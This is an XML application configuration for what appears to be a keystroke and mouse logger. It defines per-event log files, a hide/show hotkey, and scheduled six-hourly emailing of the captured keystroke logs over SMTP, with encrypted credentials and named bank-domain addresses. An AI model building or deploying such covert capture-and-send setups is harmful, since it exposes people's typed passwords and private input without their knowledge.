<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="log4net" type="log4net.Config.Log4NetConfigurationSectionHandler, log4net" />
  </configSections>
  <startup>
    <supportedRuntime version="v2.0.50727"/>
  </startup>
  <appSettings>
    <add key="logsRootPath" value="events\\"/>
    <add key="logFileName" value="keystroke"/>
    <add key="formatLogFileName" value="_dd_MM_yyyy_"/>
    <add key="extLogFile" value=".txt"/>

    <add key="logFileName_KeyPress" value="KeyPress"/>
    <add key="logFileName_KeyDown" value="KeyDown"/>
    <add key="logFileName_KeyUp" value="KeyUp"/>
    <add key="logFileName_MouseMove" value="MouseMove"/>
    <add key="logFileName_MouseClick" value="MouseClick"/>
    <add key="logFileName_MouseDown" value="MouseDown"/>
    <add key="logFileName_MouseUp" value="MouseUp"/>
    <add key="logFileName_MouseDoubleClick" value="MouseDoubleClick"/>
    <add key="logFileName_MouseWheel" value="MouseWheel"/>

    <add key="Alt" value="1"/>
    <add key="Ctrl" value="2"/>
    <add key="Shift" value="4"/>
    <add key="Win" value="8"/>
    <add key="HideShowWindowCombinationAdd" value="6"/>
    <add key="KeyCombination" value="F12"/>

    <!--GMAIL SERVER CONFIG-->
    <!--
    <add key="from" value="0d+9jaZZp2j+kNl3xAS0hnoAmkfceNptJlwxS4iFdLo=" />
    <add key="to" value="Z4yPqT8D/+S41pa4H1hgWLwqqRCqFSu5o7SKU+SuPs0=" />
    <add key="cc" value="" />
    <add key="smtpHost" value="4sNVVbQ+ZgRG3vdvjLftYQ==" />
    <add key="port" value="Q9Im5jA9WgE=" />
    <add key="usarSSL" value="mZq9CPo8XQo=" />
    <add key="requiereAutentificacion" value="mZq9CPo8XQo=" />
    <add key="user" value="0d+9jaZZp2j+kNl3xAS0hnoAmkfceNptJlwxS4iFdLo=" />
    <add key="pwd" value="yLa/yK70RuMiZvEMIEzxBQ==" />
    <add key="dominio" value="" />
    <add key="validarCertificadoDigital" value="nwZ7IyTauQ0=" />
    <add key="isBodyHtml" value="mZq9CPo8XQo=" />
    -->
    <!--mailPriority = High, Low, Normal-->
    <!--<add key="mailPriority" value="High" />-->
    
    <!--MAIL BA-->
    <add key="from" value="YVypL3Hm0rvrpgo4zGHbW5M8vUg/qLDCuUi56TG3DaA=" />
    <add key="to" value="RPhzGGdl0BgkpbL8KImnZvJ8lbhuNPs2C9ssJe4WGBw=" />
    <add key="cc" value="" />
    <add key="smtpHost" value="7MGpP5z2nmo2knX9hEnTA3W0yOhy2vNt" />
    <add key="port" value="GClTA5CwDl4=" />
    <add key="usarSSL" value="nwZ7IyTauQ0=" />
    <add key="requiereAutentificacion" value="nwZ7IyTauQ0=" />
    <add key="user" value="" />
    <add key="pwd" value="" />
    <add key="dominio" value="" />
    <add key="validarCertificadoDigital" value="nwZ7IyTauQ0=" />
    <add key="isBodyHtml" value="mZq9CPo8XQo=" />
    <!--mailPriority = High, Low, Normal-->
    <add key="mailPriority" value="High" />

    <!--INCLUYE ARCHIVOS EN ADJUNTO MAIL-->
    <add key="incLogGeneral" value="true" />
    <add key="incLog4Net" value="false" />
    <add key="incChkKeyPressLog" value="true" />
    <add key="incChkKeyDownLog" value="false" />
    <!--INTERVALO DE ENVIO DE ARCHIVOS-->
    <add key="intervalSendMailMillis" value="21600000" />
    <!--ENVIAR SI NO HAY ADJUNTOS-->
    <add key="sendMailWithOutAtachments" value="nwZ7IyTauQ0=" />
  </appSettings>
  <log4net>
    <appender name="RollingFileAppender" type="log4net.Appender.RollingFileAppender">
      <file value="log4net\log.log" />
      <appendToFile value="true" />
      <rollingStyle value="Date" />
      <datePattern value="yyyyMMdd" />
      <encoding value="utf-8" />
      <staticLogFileName value="false" />
      <layout type="log4net.Layout.PatternLayout">
        <conversionPattern value="%date [%-3thread] %-5level en %logger, ln %line: %message%newline" />
      </layout>
    </appender>
    <appender name="SmtpAppender" type="log4net.Appender.SmtpAppender">
      <to value="vguillermo@baustro.fin.ec" />
      <from value="notificacionapp@baustro.fin.ec" />
      <subject value="Error en KS !!!" />
      <smtpHost value="mail.baustro.fin.ec" />
      <port value="25" />
      <bufferSize value="512" />
      <lossy value="true" />
      <evaluator type="log4net.Core.LevelEvaluator">
        <threshold value="ERROR"/>
      </evaluator>
      <filter type="log4net.Filter.LevelRangeFilter">
        <levelMin value="ERROR"/>
      </filter>
      <layout type="log4net.Layout.PatternLayout">
        <conversionPattern value="%date [%-3thread] %-5level en %logger, %message%newline" />
      </layout>
    </appender>
    <root>
      <level value="INFO" />
      <param value="INFO" name="Threshold" />
      <appender-ref ref="RollingFileAppender" />
      <appender-ref ref="SmtpAppender" />
    </root>
  </log4net>

  <!--appender-->
  <!--<lockingModel type="log4net.Appender.FileAppender+MinimalLock" />-->

</configuration>
